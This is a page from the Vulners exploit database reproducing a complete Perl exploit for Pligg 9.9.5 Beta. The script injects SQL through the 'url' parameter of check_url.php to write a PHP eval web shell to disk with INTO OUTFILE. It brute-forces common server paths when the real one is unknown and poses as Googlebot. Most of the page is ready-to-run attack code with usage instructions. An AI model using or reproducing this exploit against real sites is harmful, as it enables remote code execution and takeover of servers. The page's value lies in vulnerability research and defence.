Vulners
Lucene search
Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit
===================================================================
Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit
===================================================================
#!/usr/bin/perl
=about
Pligg 9.9.5 Beta Perl exploit
AUTHOR
discovered & written by Ams
ax330d
VULN. DESCRIPTION:
Vulnerability hides in 'evb/check_url.php'
unfiltered $_GET['url'] parameter.
Actually, it has filtration.
Filtration strips tags and converts html
special chars , but it is not enough,
because we can use MySQLs CHAR() function
to convert shell to allowed chars.
EXPLOIT WORK:
Firtsly, exploit tryes to get full server
path, but if not succeeded, then it will brute it.
If path has been found then exploit will try
to upload tiny shell via SQl-Injection.
REQUIREMENTS:
MySQL should be able to write to file.
Know full server path to portal.
magiq_quotes_gpc=off
=cut
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
Banner();
$| = 1;
my $expl_url = shift or Usage();
my $serv_path = shift || '';
my $spider = LWP::UserAgent->new;
$spider->timeout( 9 );
$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
my $def_shell = '/libs/manager.php';
my $shell = q(<?php @eval(base64_decode($_GET['cmd']));?>);
my $sql_shell = join ',', map { ord } split //, $shell;
my @paths = qw(
/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts
/home/www /home/httpd/vhosts
/usr/local/apache/htdocs
/www/htdocs
);
exploit( $expl_url );
sub exploit {
$_ = shift;
print "\n\tExploiting: $_";
my ( $packet, $rcvd, $injection );
my ( $prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
my $req = GET "$prot://$host$path/evb/check_url.php";
my $res = $spider->request( $req );
$serv_path = $res->content =~ /template\s+in\s+(.*?)config\.php/
? $1
: $serv_path;
if ( $serv_path ne '' ) {
print "\n\tFound server path: $serv_path";
chomp( $serv_path );
$injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$def_shell'-- ";
$req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection );
$res = $spider->request( $req );
} else {
print "\n\tUnable to find path, starting bruteforce...\n";
for $serv_path ( @paths ) {
printf "\tTrying: $serv_path$path$def_shell %s\r", ' ' x 10;
chomp( $serv_path );
$injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$path$def_shell'-- ";
$req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection );
$res = $spider->request( $req );
}
}
# Checking for shell presence
$req = HEAD "http://$host$path$def_shell";
$res = $spider->request( $req );
if ( $res->status_line =~ /200/ ) {
print "\n\tExploited: http://$host$path$def_shell\n\n";
} else {
print "\n\tExploiting failed\n\n";
}
}
# Light wheel...
sub Url_Encode {
$_ = shift;
s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
return $_;
}
sub Usage {
print "\n\tUsage:\t$0 http://site.com [full server path]
Example:
$0 http://localhost/ /var/www/htdocs
$0 http://localhost/\n\n";
exit;
}
sub Banner {
print "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Pligg 9.9.5 Beta Perl exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
}
# 0day.today [2018-03-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Dec 2008 00:00Current
7.1High risk
Vulners AI Score7.1